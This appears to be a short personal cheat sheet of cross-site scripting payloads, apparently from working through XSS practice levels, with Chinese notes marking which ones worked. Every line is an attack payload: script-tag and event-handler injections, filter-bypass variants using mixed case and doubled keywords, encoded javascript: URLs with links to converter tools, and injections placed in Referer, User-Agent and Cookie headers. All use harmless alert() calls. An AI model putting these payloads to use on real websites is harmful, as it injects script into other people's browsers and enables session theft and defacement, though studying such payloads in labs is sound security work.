<script>alert('xss')</script>
"><script>alert('xss')</script>
'onclick=alert('xss') >
"onclick=alert=alert('xss') >
"><a href=alert('xss')> xss</a>(错误)
"><a href=javascript:alert(/xss/)> xss</a>(正确)
<a HrEf=javascript:alert('xss')>xss</a>
oonnclick=javasscriptcript:alert('xss')>(无效)
"><a HRhrefeF="javascrscriptipt:alert('xss')"> xss</a>
javascript:alert('xss')
javascript:alert('xss')
ASCIl 转 Unicode
https://www.bejson.com/
https://www.matools.com/code-convert-unicode
javascript:alert()
javascript:alert()/* http:// */
?t_sort=" onfocus=javascript:alert() type="text
referer:" type='text' onclick='alert(1)'
User-Agent:"type='text' onclick='alert(1)'
Cookie: user=" type="text" onclick="alert('XSS')